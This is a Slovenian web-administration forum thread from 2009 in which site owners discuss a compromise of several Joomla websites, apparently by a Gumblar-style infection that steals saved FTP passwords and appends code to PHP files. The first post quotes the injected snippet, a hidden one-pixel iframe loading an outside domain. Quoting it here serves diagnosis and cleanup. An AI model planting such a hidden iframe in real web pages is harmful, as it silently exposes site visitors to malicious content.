Vdor v večje stevilo internetnih strani

Domov > Administracija strežnikov in spletnih strani > Vdor v večje stevilo internetnih strani

stran 1 od 2 |<<12 >>|

Vdor v večje stevilo internetnih strani

perunpro1. jul 2009 12:47:04Pridružen od: 23. maj 2008 2341 objav +1337-1007	#1Pozdravljeni, na parih spletnih straneh se je zgodil vdor in prosim za informacije in pomoc. http://www.racunovodskiservis.info http://www.anasan.si/ http://avtizem.info/ http://cnvos.info/ (avast mi ne pusti gor, Chrome pa javi Malware) http://cnvos.si/ Najverjetneje se bo iskalo tudi nekoga, ki ve za kaj gre, da zadevo razcisti in pregleda. Mislim da se bo kmalu javil tudi clovek, ki ima cez te strani. Zaenkrat pa iscem kakrsnekoli informacije o tej skripti:`<iframe src ="http://viewhit.biz" width=1 height=1 style="visibility:hidden">ho $database->_ticker . ' queries executed'; echo '<pre>'; foreach ($database->_log as $k=>$sql) { echo $k+1 . "\n" . $sql . '<hr />'; } echo '</pre>'; } doGzip(); ?>` Kaj dela ta skripta? Kako je prislo do vdora? Kraja FTP gesel ali kako drugace? Mislite da je prislo prov do vdora na streznik ponudnika? Je mozno da so podatki v bazi kontanimirani? Pri eniih javlja error, pri enih je samo prazna stran (+ izvorna koda), pri enih pa proba povezat na nek cuden pejdz... Zanimivo je, da so zadeve na locenih streznikih, pri drugacnih ponudnikih gostovanja, razlicne verzije Joomle (1.0 in 1.5) - nekdo se je nacrtno spravil na Joomla related strani teh ljudi. všeč(0)ni všeč(0)spam(0) Izdelava spletnih strani, Stroji za vodni rez >>>Iscem beta testerje<<<


HeXeR1. jul 2009 13:05:27Pridružen od: 13. dec 2006 3481 objav +88-90	#2Ta skripta, ki je del manjka ... izpiše iframe, s katerim nekdo skriva svoje sledi ali pa samo prodaja porn ... ali pa kej druga mogoče :) se pa očitno tudi igra z podatkovno bazo ... težko ti napišem kaj točno, ker del kode kot sem že napisal manjka ... všeč(0)ni všeč(0)spam(0) HeXNet


sce1. jul 2009 13:28:22Pridružen od: 27. maj 2007 772 objav +112-182	#3Za začetek posodobite CMSe ki poganjajo te strani ;) všeč(0)ni všeč(0)spam(0)


perunpro1. jul 2009 13:29:07Pridružen od: 23. maj 2008 2341 objav +1337-1007	#4Kater del kode manjka? :) To je vse kar sem dobil v vednost. EDIT: sce, gre za Joomla strani in zaenkrat je treba odpraviti vdor, nato pa gledat naprej. Updejtat kontanimiran streznik se mi ne zdi ravno logicno. nazadnje urejal perunpro 1. jul 2009 13:30:07 všeč(0)ni všeč(0)spam(0) Izdelava spletnih strani, Stroji za vodni rez >>>Iscem beta testerje<<<


Mika1. jul 2009 13:31:03Pridružen od: 22. apr 2007 3027 objav +979-26730	#5Poglej tele teme: http://www.internetmojster.com/administracija/gumblar-ftp-virus.html http://www.internetmojster.com/administracija/nov-vdor-in-skodljiva-koda.html Če strani ne bi bile na Joomli ali Wordpressu, bi normalno delovale, le nek iframe bi imele vstavljen. Na Joomli in Wordpressu pa se žal ob insertiranju kode izbriše še določen del php kode, ki jo vsebuje datoteka, zato stran ne dela. Upam, da imaš backupe, ker se je ta iframe nasral v vse datoteke z imenom "index". Dobil si virus, ki ti je prebral vsa shranjena gesla za tvoj FTP program, ker si gesla shranil. Znano za Filezillo. Tako ti je nasral vse te strani. Oziroma krivec je tisti, ki je v FTP clientu imel shranjena gesla za dostop do serverja. všeč(0)ni všeč(0)spam(0)


newbe1. jul 2009 15:01:36Pridružen od: 5. jun 2008 1596 objav +96-1169	#6hej a smem vprašat malo vse ki ste ga dobili če ste uspeli ugotoviti od kod ste dobili ta virus? tnx všeč(0)ni všeč(0)spam(0) Uporabniku je bila prepovedana uporaba foruma zaradi ignoriranja pravil trgovanja


perunpro1. jul 2009 15:08:19Pridružen od: 23. maj 2008 2341 objav +1337-1007	#7Mi se ugotavljamo. Oz. zadeva je taka, da so te strani od nasega poslovnega partnerja, za katerega smo delali mi custom page - tisto kar ni bilo smiselno narediti z Joomlo - na vseh ostalih pa se fura Joomla. Mika, hvala za povezave, nisem pa mislil da je to to. Bom preveril kako je z backupi... všeč(0)ni všeč(0)spam(0) Izdelava spletnih strani, Stroji za vodni rez >>>Iscem beta testerje<<<


newbe1. jul 2009 15:37:01Pridružen od: 5. jun 2008 1596 objav +96-1169	#8ok perunpro, hvala vseeno, če zveš oz. če kdo ve bi pa prosil da deli, da se probamo ostali čimbolj izognit temu všeč(0)ni všeč(0)spam(0) Uporabniku je bila prepovedana uporaba foruma zaradi ignoriranja pravil trgovanja


theDegriz1. jul 2009 15:58:14Pridružen od: 25. mar 2007 1032 objav +837-1727	#9@newbe ta (in podobni virusi) je v bistvu virus na računalniku, ki pobere dostopne podatke za FTP in potem nalepi Zloveščo(tm) kodo v konec php datotek. Dela neodvisno od (ne)CMS-ja. @Mika: ne gre samo za index datoteke. Ima pač en čuden ključ po katerem izbira datoteke. Dela pa dosti CMS-jev tudi s tem ampak se pozna občutno pri nalagalnih časih tako, da opaziš tudi če nisi programer, da nekaj ne štima. všeč(0)ni všeč(0)spam(0) Disclaimer: Že dolgo nimam več nobene veze z Degriz d.o.o. Hvala za razumevanje.


newbe1. jul 2009 16:30:45Pridružen od: 5. jun 2008 1596 objav +96-1169	#10@theDegriz tega se zavedam, ampak na računalnik je moral nekako priti in po tem sprašujem, kje so ga staknili všeč(0)ni všeč(0)spam(0) Uporabniku je bila prepovedana uporaba foruma zaradi ignoriranja pravil trgovanja


Domov > Administracija strežnikov in spletnih strani > Vdor v večje stevilo internetnih strani stran 1 od 2 \|<<12 >>\|